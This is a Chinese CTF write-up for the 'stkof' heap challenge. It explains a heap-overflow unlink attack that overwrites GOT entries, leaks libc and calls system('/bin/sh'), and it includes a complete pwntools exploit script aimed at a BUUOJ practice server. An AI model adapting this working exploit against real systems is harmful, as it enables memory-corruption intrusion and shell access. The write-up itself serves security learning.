check一下开启的安全防护,并没有开启PIE
拿到题进行IDA反编译,可以看到有四个函数,对应四种操作,逐个分析。
allocate函数创建一个自定义大小的堆
edit函数自定大小修改堆块的内容,容易产生堆溢出
delete函数就是free堆块
还有一个没有意义的函数
这里比较重要的点是存储堆块地址的数组地址
整体思路为:
- 申请四个堆块,大小分别为0x1000,0x90,0x80,0x10
一般来说题目会使用setbuf来关闭缓冲区,但由于本题并没有采用setbuf,fgets和printf在第一次调用时会申请chunk,第一个堆块的作用就是提前申请他们的chunk,使其不影响后续的堆分布,具体原因后续还在学习。
第二堆块的作用则是伪造fake_chunk。
第三个堆块通过第二个堆块溢出修改pre_size和size(pre_inuse位),delete释放触发unlink。
第四个堆块的储存字符串'/bin/sh',方便最后执行system('/bin/sh')获取shell。
- 触发漏洞将s[2]=&s[2]-0x18
- 利用edit功能将s[0]、s[1]分别修改为strlen的got表项,free的got表项
- 将strlen的got表项修改为puts的plt表项,执行strlen相当于执行puts
- 利用上一步的puts泄露free_got的libc地址
- 利用LibcSearcher寻找libc版本,找到system的地址
- 修改free的got表项为system的地址
- 利用堆块四执行system('/bin/sh')获取shell
具体的payload如下所示
from pwn import *
from LibcSearcher import *
def create(size):
sh.sendline('1')
sh.sendline(str(size))
def edit(index,size,content):
sh.sendline('2')
sh.sendline(str(index))
sh.sendline(str(size))
sh.sendline(content)
def delete(index):
sh.sendline('3')
sh.sendline(str(index))
def show(index):
sh.sendline('4')
sh.sendline(str(index))
#sh = process('./stkof')
sh = remote('node4.buuoj.cn',26942)
elf = ELF('./stkof')
context.log_level = 'DEBUG'
heap_info = 0x0000000000602150
strlen_got = elf.got['strlen']
puts_plt = elf.plt['puts']
free_got = elf.got['free']
create(0x1000)#1
create(0x90)#2
create(0x80)#3
create(0x10)#4
edit(4,0x8,'/bin/sh\x00')
fake = p64(0)+p64(0x91)+p64(heap_info-0x18)+p64(heap_info-0x10)
fake = fake.ljust(0x90,'a')
edit(2,0xa0,fake+p64(0x90)+p64(0x90))
delete(3)
edit(2,0x18,p64(0)+p64(strlen_got)+p64(free_got))
edit(0,0x8,p64(puts_plt))
show(1)
leak = u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print(hex(leak))
libc = LibcSearcher('free',leak)
libc_base = leak - libc.dump('free')
system_addr = libc_base+libc.dump('system')
edit(1,0x8,p64(system_addr))
delete(4)
sh.interactive()